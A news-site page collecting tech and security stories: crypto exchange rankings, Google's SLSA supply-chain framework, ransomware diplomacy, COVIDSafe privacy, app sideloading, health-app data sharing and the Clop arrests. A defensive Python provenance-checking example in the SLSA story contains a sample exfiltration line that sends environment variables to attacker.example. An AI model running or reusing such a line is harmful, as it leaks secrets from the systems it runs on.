More stories

  •

    The top crypto exchanges you need to know

    Cryptocurrency exchanges are a lot like the auction house in World of Warcraft. Like in WoW, you’re buying and selling digital goods, except this time you’re buying and selling, say, Dogecoin instead of Crystalized Dread. Basically, crypto exchanges help traders acquire or divest cryptocurrency holdings. They do this by converting fiat money (actual government-backed currency) into the digital currency of your choice (and vice versa when you sell). Some exchanges only take real money. Some only take digital currency. All charge fees of one sort or another, which is key to how they make a profit.

    It should go without saying, but we’ll say it here: investing in cryptocurrency is risky as all heck. Crypto investing involves transferring hard-earned actual money for some fake bits generated by a purposely obtuse algorithm in the hope that enough other people will believe in the fake bits to make them somehow real. If that raises the hairs on the back of your neck, it should. But some of you will be brave enough, or crazy enough, or wealthy enough that it just doesn’t matter, and put down cold, hard cash in return for fantasy money. Good luck. People out there are making money off this stuff. We’re not, but someone is.

    How we made our selections

    We did a literature review of the findings of six financially-oriented sites (they’re listed below) that ranked the exchanges, and aggregated those findings. By looking at findings from evaluators across the internet, we stand a better chance of creating a reliable picture of the exchanges, while also being careful to avoid picking winners in a possibly regulated market. Across all the sites, we identified 43 crypto exchanges. Of those 43 exchanges, 29 were reviewed on only one site. Because we’re explicitly trying to find how they’re perceived across the internet, we removed all of the one-hit wonders. We also removed another six exchanges that showed up on only two sites. None of them scored near the top of their respective reviewers’ lists, so there was no great loss. That left us with seven providers reviewed on three or more sites, giving us a good starting point. Of those seven, four exchanges (Coinbase, Gemini, Binance.US, and Kraken) each got three sets of star ratings. Two sites rated on a 1-5 scale and one (BitDegree) rated on a 1-10 scale. We converted BitDegree’s rating to a 1-5 scale (by halving it), which let us average the ratings for the four exchanges where we had enough representative data.

    These are the crypto exchanges that you might consider checking out.

    Probably the best-known crypto exchange

    Overview
    Review average: 4.63
    Free crypto on signup: $5 worth of free bitcoin
    Number of currencies: 20+
    Wallet: Yes

    Trading fees
    Spread fee: 0.5%
    Fees: $1.49 – $2.99 depending on amount
    Wire transfer fees: $10 incoming, $25 outgoing

    Payment fees when buying crypto
    ACH deposits: 1.49%
    Coinbase wallet: 1.49%
    Debit cards: 3.99%

    Many categories of online services have canonical brands that are nearly synonymous with the category. For online shopping, it’s Amazon. For auctions, it’s eBay. For movie streaming, it’s still Netflix. For cryptocurrency, it’s Bitcoin. And for crypto exchanges, it’s Coinbase. No other crypto exchange has the brand equity of Coinbase. Coinbase was one of only two sites rated by all our source reviewers (the other was Gemini).

    Coinbase seems to be a solid platform if you’re just starting out and you want to trade some bitcoin. One benefit of Coinbase is that it’s a US company. This matters if you’re holding more than $10,000 and want to keep your tax paperwork simpler: because the exchange is domestic, US Coinbase customers are not required to file the Report of Foreign Bank and Financial Accounts (FBAR) with FinCEN for it.

    Coinbase does offer a wallet, so you can treat the exchange as your one-stop shop for basic crypto. There’s also a Coinbase Pro service for those who have more in-depth intentions in this field.

    Pros
    Probably the best-known crypto exchange
    Clean user interface

    Cons
    Mediocre technical support
    Higher fees than many

    View Now at Coinbase

    A monster of a crypto exchange

    Overview
    Review average: 4.62
    Free crypto on signup: None
    Number of currencies: 50+
    Wallet: No

    Trading fees
    Fees (maker/taker): 0-0.2%/0.1-0.5% depending on volume
    Additional fees: Leveraged buying has margin opening and rollover fees

    Payment fees when buying crypto
    ACH deposits: $0-10 depending on bank option
    Debit/credit cards: 3.75% + $0.25
    Crypto deposit: Percentage of currency being deposited (varies by currency)

    Withdrawal fees
    Cash withdrawal: $0-35 depending on bank option
    Crypto withdrawal: Percentage of currency being withdrawn (varies by currency)

    There’s something unsettling about using a currency exchange whose name immediately brings to mind the phrase “beware the…”. But, at least according to the aggregated internet reviews, you probably don’t have to beware this Kraken. It has the second-highest review average and quite a lot of positive comments.

    The Miami Herald, for example, says it has the “best customer support of any crypto exchange,” even though the only support provided is via chat or ticket requests. Given that many of the crypto exchanges we’ve looked at tend to elicit “good, but terrible customer support,” that may not be a terribly high bar. But any customer support has to be better than terrible customer support, so there you go.

    The customer support may be needed, because the interface is relatively complex and is reputed to “have bugs that need fixing in the UI,” according to the Herald. Kraken also offers a variety of advanced services including margin trading, futures trading, and staking rewards.

    Pros
    Better customer service than many other exchanges
    Wide range of currencies and services

    Cons
    Complex interface
    Somewhat buggy

    View Now at Kraken

    Lots of currencies, but US restrictions and UI issues

    Overview
    Review average: 4.57
    Free crypto on signup: None
    Number of currencies: 200+
    Wallet: Yes

    Trading fees
    Spot trading fee: 0.1%
    Instant buy/sell fee: 0.5%
    Discount: 25% if you pay fees in BNB (Binance’s own token)

    Deposit fees
    ACH deposits: free
    Wire: $15
    Debit cards: 4.5%

    Withdrawal fees
    ACH withdrawal: 0%
    Wire: $15 domestic, $35 international
    Debit card: not available

    Binance.US is the American version of the Binance trading platform. The US site has a more limited selection of coins and tokens to trade than the international Binance. That’s not necessarily meant to imply that the coins and tokens on the US implementation are any safer, however.

    There are also issues with access control. We’ve seen quite a few reports like this one, which describe serious difficulties setting up and using multifactor authentication.

    If you’re a big-money trader (more than $50,000 in a given month), you may be able to get discounts on trading fees. The company offers a wide range of order types including limit, market, and stop-limit mechanisms. Some of these options may not be available in the US.

    Pros
    Big volume discounts
    Many coin types available

    Cons
    Futures and margin trading not available in the US
    Many additional limits for US traders

    View Now at Binance.US

    Because…the founders are the Winklevoss twins

    Overview
    Review average: 4.23
    Free crypto: $10 worth of Bitcoin after buying/selling $100 of BTC
    Number of currencies: 25+
    Wallet: No

    Trading fees
    “Convenience” fee: 0.5% over market rate
    Transaction fees: $0.99-$2.99
    Large transaction ($200+) fee: 1.49% of market value

    Deposit fees
    ACH deposits: free
    Wire transfer fees: $10 incoming, $25 outgoing
    No debit or credit cards

    Transfer fees
    ACH: free
    Wire: free
    Some crypto: free

    So here’s a bit of trivia. Remember Cameron Winklevoss and Tyler Winklevoss, contenders for the title of founders of Facebook? It’s a long story and part of a relatively inaccurate movie with Aaron Sorkin’s unbelievable but spectacularly-written dialog. Both Winklevi (they’re twins) were played by Armie Hammer in the movie.

    Gemini trades in quite a few digital currencies, but that’s not all. The company has begun trading in NFTs. One interesting fact is that Gemini is a US-based company regulated by the New York State Department of Financial Services, and its customers’ US dollar balances are held at FDIC-insured banks (the insurance covers those dollars, not the crypto).

    Gemini appears to generally have a reputation for a good UI. Guru99 says, “It is a simple, elegant, and secure way to build bitcoin and crypto portfolio.” That feeling is echoed by most of the internet evaluations we examined.

    Pros
    Good user interface
    New York State regulated

    Cons
    Challenging and unclear fee structure
    Founders not on Zuckerberg’s Friends list

    View Now at Gemini

    Lots of currencies and flat-fee trading

    Overview
    Review average: not enough ratings
    Free crypto: No
    Number of currencies: 220+
    Wallet: Yes

    Trading fees
    Flat fee for all transactions: 0.25%

    Deposit fees
    No wire transfer fees
    Only US dollar transfers allowed via wire transfer
    Individual currency transfers may have fees

    According to Tradesanta.com, “Bittrex is probably one of the most advanced crypto exchanges on the market today. It provides users with the fastest transactions available.”

    Bittrex is based in Seattle, up here in the Pacific Northwest. However, despite being a US-based company, Bittrex states “Bittrex is not a regulated exchange under U.S. securities laws.”

    Bittrex was founded by Bill Shihara (a former security engineering manager at Amazon and Blackberry, with a prior 11-year Microsoft tenure), Richie Lai (a former leader in the Amazon information security team, with a prior 12-year Microsoft tenure), and Rami Kawach (a former principal security engineer at Amazon, with time at Qualys and Microsoft). All that certainly explains why they’re based in the Evergreen State.

    Pros
    Free online wallet
    Very few deposit fees
    A metric ton of currencies

    Cons
    No margin trading
    Flat fee could get expensive

    View Now at Bittrex

    Accepts credit and debit cards, plus Apple Pay

    Overview
    Review average: not enough ratings
    Free crypto: No
    Number of currencies: 10+
    Wallet: No

    Trading fees
    Spread: XBX + 2%
    Buy order commission fee: Up to 3.9%
    Sell order commission fee: 0.1% to 0.9%

    Payment fees when buying crypto
    Debit/credit cards: Additional 5% “momentum” fee
    SEPA bank transfer fee: £0
    SWIFT bank transfer: £0 over $1,000, £20 under $1,000

    Withdrawal fees
    Withdrawal: $0
    Additional sell fee: 0.1-0.9%

    Coinmama, the exchange with the best name we’ve seen, was founded by Nimrod Gruber (also the best founder name we’ve seen), is registered in Slovakia, and operates out of Israel.

    The exchange’s most obvious benefit is the ease of transferring fiat currency (i.e., dollars or euros) into and out of the exchange. The firm accepts not only debit cards, but credit cards and even Apple Pay.

    Coinmama is more of a reseller than an exchange. You can’t use one cryptocurrency to buy another. Instead, if you want to buy a currency, you have to use fiat money. The same is true of selling a currency. So if you want to use your Bitcoin to buy Ethereum, you’ll first need to sell your Bitcoin and get dollars or euros, then spend those dollars or euros to buy the Ethereum.

    When you add up the spread percentage plus the sell fee percentage, you get a fee basis that’s higher than Coinbase, which has among the highest fees we’ve seen. You can lower those fees a bit by being what Coinmama calls Curious, Enthusiast, or Believer, a loyalty discount based on your trading volume over both a rolling 90-day period and your lifetime on Coinmama.

    Pros
    Best name evar!
    Accepts credit and debit cards, plus Apple Pay

    Cons
    Very few currencies compared with other exchanges
    Flat fee could get expensive

    View Now at Coinmama

    eToro

    Automatically mimic successful traders (and there’s Alec Baldwin)

    Overview
    Review average: not enough ratings
    Free crypto: Get $50 when you buy $1,000 worth of crypto
    Number of currencies: 14
    Wallet: Yes

    Trading fees
    Trading fee: 0.75% to 2.9%, based on the spread between bid and ask
    Conversion (currency to currency) fee: 0.1%

    Payment fees when buying crypto
    Deposit fee: $0
    Additional fees: Extra fee for depositing non-USD currency

    Withdrawal fees
    Withdrawal: $0
    Additional fees: Extra fee for withdrawing in non-USD currency

    One of the most interesting features of eToro is its “practice trading account,” which allows you to game trading and get used to the process before risking actual money. Another interesting feature is eToro’s CopyTrade option, which allows you to automatically run trades based on the actions of top traders on the platform. Essentially, you can put your trading on autopilot, and as long as the trader you’re mimicking is making smart moves, so will you.

    Be aware that there are some built-in delays getting started with eToro. Every incoming deposit is put on hold for 7 days. Transfers can then take another 3 days, so you’re looking at 10 days before you’re actually in the money, er, crypto. This applies to wired-in funds as well, which can also take up to 7 days to hit your account.

    Pros
    Ability to mimic successful traders automatically
    Practice trading account
    The best Baldwin

    Cons
    Comparatively high trading fees
    Credit/debit cards not accepted
    Baked-in delays on top of baked-in delays

    How much does it cost to trade crypto currency?

    While exchanges are not banks, they all have one very bankerly philosophy: whether or not you make money, the banker always wins. In this case, the exchanges make money through a wide range of fees attached to just about everything. For example, there’s the spread. If you buy cryptocurrency, you’ll pay a bit more than the market price; if you sell, you’ll get a bit less. That bit more or bit less is the spread, and it’s a fee even though it never shows up as a line item. On top of the actual purchase fees are the fees you pay to bring real-world money (fiat, in crypto vernacular; not to be confused with stablecoins, which are crypto tokens pegged to a fiat currency) into the exchange. These include ACH transfers, wire transfers, use of the exchange’s wallet, and debit and credit card fees (although most exchanges only accept debit cards).

    How secure are crypto exchanges?

    Many of the reviewers we explored during our literature review made claims about the security of the various exchanges. Over the past year, there has been a constant series of hacks of exchanges, accounts, and crypto-related activities. We do not feel that we have anywhere near enough information to declare one exchange more secure than another (and, quite honestly, don’t feel that any reviewer has enough information to make such claims). As such, we’re not reporting that one exchange is more secure than another, or that this or that exchange has not been hacked (because it may have been, but not reported it). What you can control is your own account: turn on the strongest second factor the exchange supports (a hardware security key or an authenticator app rather than SMS), enable withdrawal address allow-listing where it’s offered, and don’t leave more on the exchange than you’re actively trading. Beyond that, this is definitely an area where caveat emptor is in full effect. Be careful, young Padawan. Be very, very careful.

    How risky is crypto investment?

    Look, crypto investing isn’t for everyone. Almost everything about the process, once you think about the real money implications, should invoke a sense of caution and care, if not some crystalized dread. Much of the terminology and many of the mechanisms behind crypto trading are complex and arcane, so it’s very possible to lose your shirt. That said, the exchanges we’re spotlighting here seem to be some of the best out there, at least according to other outlets that examined them in some detail.

    Personally, most of my digital currency holdings are in World of Warcraft gold, and even that has some market value. If you want 5,000 WoW gold coins, you can buy them for about $400. I didn’t buy my gold. Instead, years ago when I had more time to play video games, I farmed it (the WoW equivalent of crypto mining) in game.

    Why do I keep bringing all this back to fake money in a video game? Because, fundamentally, all these cryptocurrencies we’ve been talking about are also fake money in a digital space. The value of crypto exists solely because enough people decided it has value — and that value can vanish the minute people lose faith.

    But isn’t that also true of so-called real money? Most of us have paper in our wallets or a number on a website that represents our cash holdings. Our real money has value because we choose to accept it for goods and services. So, it’s entirely possible that, as time moves on, more and more sellers will accept certain cryptocurrencies in return for their goods and services. For now, though, just be careful.

    The sites we used as source material

    These are the sites we used in researching and assembling the data in this article:

    What about you? Have you invested in crypto? Do you plan to in the future? Share your thoughts and experiences (and advice, if you have any) below.

    You can follow my day-to-day project updates on social media. Be sure to follow me on Twitter at @DavidGewirtz, on Facebook at Facebook.com/DavidGewirtz, on Instagram at Instagram.com/DavidGewirtz, and on YouTube at YouTube.com/DavidGewirtzTV.

  •

    Open-source security: Google has a new plan to stop software supply chain attacks

    To tackle the growing threat of attacks on the software supply chain, Google has proposed the Supply chain Levels for Software Artifacts framework, or SLSA which is pronounced “salsa”. Sophisticated attackers have figured out that the software supply chain is the soft underbelly of the software industry. Beyond the game-changing SolarWinds hack, Google points to the recent Codecov supply chain attack, which stung cybersecurity firm Rapid7 via a tainted Bash uploader.


    While supply chain attacks aren’t new, Google notes they’ve escalated in the past year, as attackers have shifted their focus away from exploits for known or zero-day software vulnerabilities. Google describes SLSA as “an end-to-end framework for ensuring the integrity of software artifacts throughout the software supply chain.” It takes its lead from Google’s internal “Binary Authorization for Borg” (BAB), a process Google has been using for more than eight years to verify code provenance and implement code identity. The goal of BAB is to reduce insider risk by ensuring that production software deployed at Google is properly reviewed, especially if the code has access to user data, Google notes in a white paper.

    “The goal of SLSA is to improve the state of the industry, particularly open source, to defend against the most pressing integrity threats. With SLSA, consumers can make informed choices about the security posture of the software they consume,” said Kim Lewandowski of Google’s open-source security team and Mark Lodato, from the BAB team. SLSA looks to lock down everything in the software build chain, from the developer to the source code, the build platform and CI/CD systems, the package repository, and dependencies. Dependencies are a major weak point for open-source software projects. In February, Google proposed new protocols for critical open-source software development that would require code reviews by two independent parties, and that maintainers use two-factor authentication. It reckons the higher SLSA levels would have helped prevent the attack on SolarWinds’ software build system, which was compromised to install an implant that injected a backdoor during each new build. It also argues SLSA would have helped in the Codecov attack because “provenance of the artifact in the GCS bucket would have shown that the artifact was not built in the expected manner from the expected source repo.” While the SLSA framework is just a set of guidelines for now, Google envisages that its final form will go beyond best practices via enforceability. “It will support the automatic creation of auditable metadata that can be fed into policy engines to give ‘SLSA certification’ to a particular package or build platform,” Google said. The scheme consists of four SLSA levels, with level four being the ideal state where all software development processes are protected, as pictured below.
    Image: Google
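    To make the Codecov argument above concrete, here is an added example of the kind of policy check SLSA-style provenance enables: a consumer recomputes the artifact’s digest, looks it up in the provenance statement, and rejects the artifact unless a trusted builder produced it from the expected source repository at a pinned commit. This is illustrative code written for this page, not Google’s code and not the SLSA project’s tooling; the document layout is an assumption loosely modelled on an in-toto statement carrying a SLSA provenance predicate, and the builder URL, repository, commit, scripts and digests are all constructed for the example. Real provenance is also signed by the builder, which this example omits.

```python
import hashlib
import re
from typing import Dict, List

# Policy inputs (assumed values for this example): the one builder we trust and
# the one source repository the uploader script is allowed to come from.
EXPECTED_BUILDER_ID = "https://ci.example.com/builder/v1"
EXPECTED_SOURCE_REPO = "https://github.com/example/uploader"
COMMIT_RE = re.compile(r"^[0-9a-f]{40}$")  # require a full, immutable git commit hash


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_provenance(artifact: bytes, builder_id: str, repo: str, commit: str) -> Dict:
    """Build a simplified provenance statement for `artifact` (assumed shape).

    The subject names the artifact by digest; the predicate records which builder
    produced it and from which source material (repo pinned to a commit).
    """
    return {
        "_type": "https://in-toto.io/Statement/v0.1",
        "subject": [{"name": "uploader.sh", "digest": {"sha256": sha256_hex(artifact)}}],
        "predicateType": "https://slsa.dev/provenance/v0.2",
        "predicate": {
            "builder": {"id": builder_id},
            "materials": [{"uri": f"git+{repo}@{commit}"}],
        },
    }


def check_provenance(artifact: bytes, statement: Dict) -> List[str]:
    """Return policy violations for `artifact`; an empty list means accept.

    Three checks: the statement describes exactly these bytes, the builder is the
    trusted one, and the source is the expected repo pinned to a full commit.
    """
    violations: List[str] = []

    digests = [s.get("digest", {}).get("sha256") for s in statement.get("subject", [])]
    if sha256_hex(artifact) not in digests:
        violations.append("subject digest does not match the artifact")

    predicate = statement.get("predicate", {})
    if predicate.get("builder", {}).get("id") != EXPECTED_BUILDER_ID:
        violations.append("artifact was not produced by the trusted builder")

    prefix = f"git+{EXPECTED_SOURCE_REPO}@"
    sources = [m.get("uri", "") for m in predicate.get("materials", [])]
    pinned = [u[len(prefix):] for u in sources if u.startswith(prefix)]
    if not pinned:
        violations.append("artifact was not built from the expected source repo")
    elif not any(COMMIT_RE.match(c) for c in pinned):
        violations.append("source is not pinned to a full commit hash")

    return violations


# Constructed sample inputs: a legitimate uploader script and a tampered copy
# that appends an exfiltration step, mirroring the shape of the Codecov incident.
GOOD_SCRIPT = b"#!/bin/bash\ncurl -sS https://upload.example.com/report -F file=@coverage.xml\n"
TAINTED_SCRIPT = GOOD_SCRIPT + b"curl -s -d \"$(env)\" https://attacker.example/collect\n"
GOOD_COMMIT = "0123456789abcdef0123456789abcdef01234567"


def demo() -> Dict[str, List[str]]:
    """Run the policy over three scenarios and return the violations for each."""
    legit = make_provenance(GOOD_SCRIPT, EXPECTED_BUILDER_ID, EXPECTED_SOURCE_REPO, GOOD_COMMIT)
    # Scenario 2: attacker swaps the bytes in the bucket but leaves the real
    # provenance in place, so the digest no longer matches.
    swapped = check_provenance(TAINTED_SCRIPT, legit)
    # Scenario 3: attacker also supplies a statement for the tainted bytes, but
    # it can only name their own builder and their own fork.
    forged = make_provenance(TAINTED_SCRIPT, "https://attacker.example/builder",
                             "https://github.com/attacker/uploader", GOOD_COMMIT)
    return {
        "legitimate": check_provenance(GOOD_SCRIPT, legit),
        "swapped_bytes": swapped,
        "forged_provenance": check_provenance(TAINTED_SCRIPT, forged),
    }


if __name__ == "__main__":
    for name, problems in demo().items():
        print(f"{name}: {'ACCEPT' if not problems else 'REJECT: ' + '; '.join(problems)}")
```

    The point of the third check is the one Google makes about Codecov: an artifact whose provenance names a different repo (or no repo at all) is rejected even if its digest is self-consistent, and an artifact replaced in place fails on digest alone. Without a builder signature over the statement, the check only catches a sloppy attacker; with one, the attacker would need the builder’s signing key to pass.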

  •

    Biden and Putin spar over cybersecurity, ransomware at Geneva summit

    Ransomware was a major point of discussion for both US President Joe Biden and Russian President Vladimir Putin during their first in-person summit on Wednesday. After the three-hour meeting in Geneva, Switzerland, both leaders held separate press conferences where they hinted at key points of discussion and potential compromise. Putin denied that Russia was harboring ransomware groups and refused to answer questions about other cyberattacks. Biden was also vague about what was agreed upon between the two leaders but confirmed that he pressed Putin specifically on the issue of ransomware. “I talked about the proposition that certain critical infrastructure should be off limits to attack. Period. By cyber or any other means. I gave them a list, 16 specific entities. 16 defined as critical infrastructure,” Biden said. Tom Kellermann, a member of the US Secret Service’s Cyber Investigations Advisory Board, said the 16 entities Biden was referring to were what CISA has defined as “critical infrastructure sectors.” Kellermann added that the 16 sectors are chemical, commercial facilities, communications, critical manufacturing, dams, defense industrial base, emergency services, energy, financial services, food and agriculture, government facilities, healthcare and public health, information technology, nuclear reactors, materials and waste, transportation systems, and water and wastewater systems. All of these sectors have faced dozens of ransomware attacks over the last three years, and Biden said he pushed Putin to understand what the US was going through. He referenced the ransomware attack on Colonial Pipeline, which left parts of the East Coast scrambling for gas for days. “I looked at him and said: ‘How would you feel if ransomware took on the pipelines from your oil fields?’ He said: ‘It would matter.’ I pointed out to him that we have significant cyber capability. And he knows it,” Biden said to reporters.

    He went on to say that there were “reputational” consequences to the cyberattacks launched from Russia that Putin was aware of. The meeting follows a stern warning sent out by the US and other G7 countries on Monday that specifically called out Russia for either launching its own cyberattacks or harboring ransomware organizations. The G7 said Russia needed to “identify, disrupt, and hold to account those within its borders who conduct ransomware attacks, abuse virtual currency to launder ransoms, and other cyber crimes.” NATO also sent out a statement after its own summit in Brussels reaffirming the idea that “the impact of significant malicious cumulative cyber activities might, in certain circumstances, be considered as amounting to an armed attack.” Kellermann, who is also head of cybersecurity strategy at VMware, said the summit was “a seminal moment for civilizing cyberspace” and praised Biden for highlighting the need to protect critical industries. “As a result of this delineation, I believe that significant ransomware attacks against major critical infrastructures will diminish now, but possibly increase against traditional corporations, such as in the retail and financial sectors.” Many cybersecurity experts said the summit would have little effect on ransomware groups allowed to operate with impunity in a number of countries. But the idea that cybersecurity had reached a level of concern worthy of mention between two world leaders was a positive sign for some. “It was an excellent use of the ‘bully pulpit’ to let the world know that cybersecurity matters to America — and specifically the office of the president. We in the cybersecurity world already have an ‘all-hands-on-deck’ mentality — but it’s healthy to see that our concern is now shared in the prism of leadership, outside of our sector,” said YouAttest CEO Garret Grajek.
    Elena Elkina, a partner at privacy and data protection consulting firm Aleada, noted that Putin does not like demands or being told what to do, and she predicted he would respond to Biden’s forceful talk about cyberattacks in a more understated way. “It will be something more tangible that makes obvious his opinion,” she said. Cybersecurity researcher Chloé Messdaghi said the summit was just one manifestation of a deeper cyber Cold War that both countries needed to back down from. While the summit was a good start to addressing the problems between the two countries, Messdaghi said formalized pacts around cybersecurity would be hard to come by. “The reality is that we may never have absolute and effective treaty-level accords on cyberattacks because so much is done by proxy, but each global superpower must strive to prevent chaos within their borders,” Messdaghi added.

  •

    14 COVIDSafe enquiries to OAIC, but still no complaints or breaches

    The Office of the Australian Information Commissioner (OAIC) has released its second six-monthly report on the privacy and security of Australia’s controversial COVIDSafe app. While there were no reports of breaches, no complaints made, and no investigations underway, the OAIC said the app, paraded by Prime Minister Scott Morrison as “digital sunscreen”, was the subject of 14 “enquiries”. This comprised 12 enquiries from individuals and two from businesses during the period 16 November 2020 to 15 May 2021. “We provided general information in response to 11 enquiries and provided assistance on how to make a complaint in response to three enquiries,” the report [PDF] said. During Senate Estimates last month, Information and Privacy Commissioner Angelene Falk said the OAIC had, by the end of April, received around 25 inquiries from members of the public seeking information about COVIDSafe and their privacy rights. Breaking down the types of enquiries, the report said the OAIC received 10 enquiries raising general issues or concerns about COVIDSafe, including an enquiry about the changes to the Privacy Act relating to COVIDSafe and an enquiry from an individual seeking to delete data uploaded to the National COVIDSafe Data Store. The OAIC also received four enquiries about a request to download or use COVIDSafe, which the report explained as an enquiry about a venue refusing an individual entry unless they used COVIDSafe or signed in using a QR code, and an enquiry about whether an employer could require an employee to download COVIDSafe.

    The legislation wrapped around COVIDSafe prevents a directive from an employer or venue to require the app’s download.Falk told Senators last month the OAIC has implemented a series of assessments or audits of the COVIDSafe app, which she said assess the privacy safeguards in relation to the Privacy Act and follow the “information lifecycle” of the COVIDsafe app.”We’re assessing the security and access protections to the national COVIDSafe’s data storage facility,” she said. “We’re also assessing the manner in which information is accessed by the states and territories. And the legislation passed by Parliament at this time last year, gave my office jurisdiction in relation to the states and territories handling of that COVIDSafe app data.”The OAIC has four assessments underway. The report said the OAIC has progressed draft reports for all of them.The agency also provided guidance for state and territory health authorities regarding COVIDSafe and COVID app data during the reported period.Also included in the OAIC document is a report from the Inspector-General of Intelligence and Security (IGIS).IGIS reviewed the compliance of agencies it has oversight of between 16 November 2020 and 15 May 2021 and said it remained satisfied that these agencies have appropriate policies and/or procedures in place and are taking reasonable steps to avoid the intentional collection of COVID app data.”IGIS staff have conducted inspections of these agencies to determine whether COVID app data that has been collected incidentally as part of agency functions has not been accessed or used, and that any COVID app data has been deleted as soon as practicable after the agency becomes aware it has been collected,” IGIS wrote in its brief report.”While relevant agencies have incidentally collected COVID app data, which the Privacy Act recognises may occur, IGIS had found that there is no evidence to suggest that these agencies have deliberately targeted or have decrypted, accessed, or used 
    such data.” IGIS has not received any complaints or public interest disclosures about COVIDSafe app data, but said there were ongoing discussions between relevant parties regarding the application of the prohibition against “disclosure” as set out in the Privacy Act. COVIDSafe, according to the Digital Transformation Agency, had picked up 567 close contacts not found through manual contact tracing, a large increase on the previous figure of 17 contacts. The agency said there have been 779 uploads to the National Data Store since inception last year. Earlier this week, the government of Western Australia introduced legislation that would keep the information obtained via the SafeWA check-in app by contact tracers away from the state’s law enforcement authorities. The state currently lacks protections for such information, with WA Police having used it to investigate “two serious crimes”. “The system was introduced in the middle of the global pandemic and while access to this information was lawful, the WA government’s intention was for contact registers to only be used for contact tracing purposes,” the government said. “Information collected through the SafeWA app has never been able to be used for commercial purposes. This will remain the case under the new legislation.” The ABC on Wednesday reported the state government was forced to introduce legislation after failing to reach an agreement with police. The report indicates Premier Mark McGowan found out in April that police were accessing the data to find witnesses to a number of serious crimes, including a murder, but was previously unaware. “We attempted to negotiate an agreement with the police. They advised that it was lawful, and they couldn’t not do things that are lawful,” he told ABC Radio Perth. WA Police Commissioner Chris Dawson said the circumstances that required access to the SafeWA data were exceptional. “I accept that people don’t always read fine print on insurance policies or whatever, and this is a very important principle, but the police have only got information twice out of 240 million transactions and they were exceptional circumstances, and it is lawful,” he said, speaking on 6PR radio. “Police have a duty to investigate crime, and we’re talking about a man who was shot in a public arena with an allegedly high-powered weapon, and other people were injured.” The state opposition has called it “a breach of trust”.

  •

    Tim Cook claims sideloading apps would destroy security and privacy of iOS

    Image: Apple
    Tim Cook has claimed in an interview with Brut that if Apple were forced to allow sideloading of apps, as Android does, it would destroy the security and privacy of iOS. Speaking about the Digital Markets Act proposed by the European Commission, Cook said sideloading was not in the “best interests of the user”. “That would destroy the security of the iPhone and a lot of the privacy initiatives that we’ve built into the App Store where we have privacy nutrition labels and app tracking transparency, where it forces people to get permission to track across apps,” Cook said. “These things would not exist anymore except in people that stuck in our ecosystem and so I worry deeply about privacy and security.” The Apple CEO said Android has 47 times more malware than iOS, and that this was directly due to Apple’s ecosystem being tied to one app store with all apps being reviewed. “That keeps a lot of this malware stuff out of our ecosystem, and customers have told us very continuously how much they value that, and so we’re going to be standing up for the user in the discussions and we’ll see where it goes,” he said. Cook did say there were parts of the Digital Services Act (DSA) that could be used to fight online disinformation.

    “We do suffer today from vast disinformation … it’s clear that there needs to be something done here,” he said. “This is not an acceptable state of the world and as I look at the DSA, there’s some parts of it that I think will help this, but I’m not sure that anybody yet has a handle on how to fix it entirely and I think it deserves more discussion and more debate.” In recent testimony as part of the Epic vs Apple trial, Cook said that without curation, Apple’s App Store would be a toxic mess.

  • in

    Macquarie Uni researchers find an oversharing of personal data in health apps

    Image: Getty Images
    Researchers from Macquarie University have found what they labelled serious problems with privacy, and inconsistent privacy practices, in health apps. The researchers estimated that just over 99,000 apps out of the 2.8 million on Google Play and 1.96 million on the Apple App Store relate to health and fitness. They include apps for managing health conditions and checking symptoms, as well as step and calorie counters and menstruation trackers.

    They probed 15,000 free health apps in the Google Play store and compared their privacy practices with a random sample of more than 8,000 non-health apps. They found that while these apps collected less user data than other types of mobile apps, 88% could access and potentially share personal data. “For example, about two thirds could collect advert identifiers or cookies, one third could collect a user’s email address, and about a quarter could identify the mobile phone tower to which a user’s device is connected, potentially providing information on the user’s geolocation,” the researchers wrote in a study published by The BMJ.

    Only 4% of the health-related apps were actually observed transmitting data, mostly the user’s name and location information. “This percentage is substantial and should be taken as a lower bound for the real data transmissions performed by the apps,” they added.

    The analysis of app files and code identified 65,068 data collection operations, on average four for each app. Analysis of app traffic identified 3,148 transmissions of user data across 616 different apps. The main types of data collected by these apps include contact information, user location, and several device identifiers such as the IMEI, MAC address, and IMSI (international mobile subscriber identity).

    Privacy analysis of mobile health apps
    Image: Macquarie University
    87.5% of data collection operations and 56% of user data transmissions were on behalf of third-party services, such as external advertisers, analytics, and tracking providers, the research found. 23% of user data transmissions occurred on insecure communication channels, they added. 665 unique third-party entities were identified, but those responsible for most of the data collection operations, the researchers said, were the likes of Google, Facebook, and Yahoo!. “The apps collected user data on behalf of hundreds of third parties, with a small number of service providers accounting for most of the collected data,” the research says.

    The researchers also found that 28% (5,903) of the apps analysed did not offer any privacy policy text, and at least 25% (15,480) of user data transmissions violated what was stated in the privacy policies. “Mobile apps are fast becoming sources of information and decision support tools for both clinicians and patients,” the researchers concluded. “Such privacy risks should be articulated to patients and could be made part of app usage consent. We believe the trade-off between the benefits and risks of ‘mHealth’ apps should be considered for any technical and policy discussion surrounding the services provided by such apps.”

  • in

    Ukrainian police partner with US, South Korea for raid on Clop ransomware members

    The Ukrainian National Police announced a series of raids on Wednesday that ended with the arrest of six people allegedly part of the group behind the Clop ransomware. The group is responsible for some of the most headline-grabbing ransomware attacks seen over the last two years, with hundreds of victims ranging from Shell and Kroger to Stanford University, the University of Maryland, and the University of Colorado. Ukrainian police said the total damage done by their attacks amounts to an estimated $500 million.

    The Cyberpolice Department of the Ukrainian National Police released a lengthy report Wednesday morning on the raids that included photos and video. Working with South Korean police officers, members of Interpol and unnamed US agencies, officers in Ukraine raided 21 different residences in Kyiv and nearby towns. During the raid, dozens of computers and expensive cars were seized in addition to about $185,000. The report said server infrastructure was taken down and the homes were seized. The six people arrested face up to eight years in prison for a variety of crimes related to the group’s ransomware attacks and the laundering of money brought in from ransoms.
    Image: Ukrainian National Police
    The Ukrainian National Police noted that South Korean officials were particularly interested in the raid because of ransomware attacks launched by Clop against four South Korean companies in 2019. More than 800 internal servers and computers from the companies were infected in the attacks. The group also attacked South Korean e-commerce giant E-Land in November, crippling the company for days. Clop members became well known for attacking companies, such as Bombardier, that were running old versions of the Accellion FTA file-sharing server. The Reserve Bank of New Zealand, Washington State Auditor, and cybersecurity firm Qualys are just a few of the victims attacked by Clop members through the Accellion vulnerability.

    Kim Bromley, senior cyber threat intelligence analyst at Digital Shadows, said the Clop ransomware has been active since February 2019 and generally targets large organizations. “Despite partaking in the ever-popular double-extortion tactic, Clop’s reported activity level is relatively low when compared with the likes of ‘REvil’ (aka Sodinokibi) or ‘Conti’,” Bromley explained.

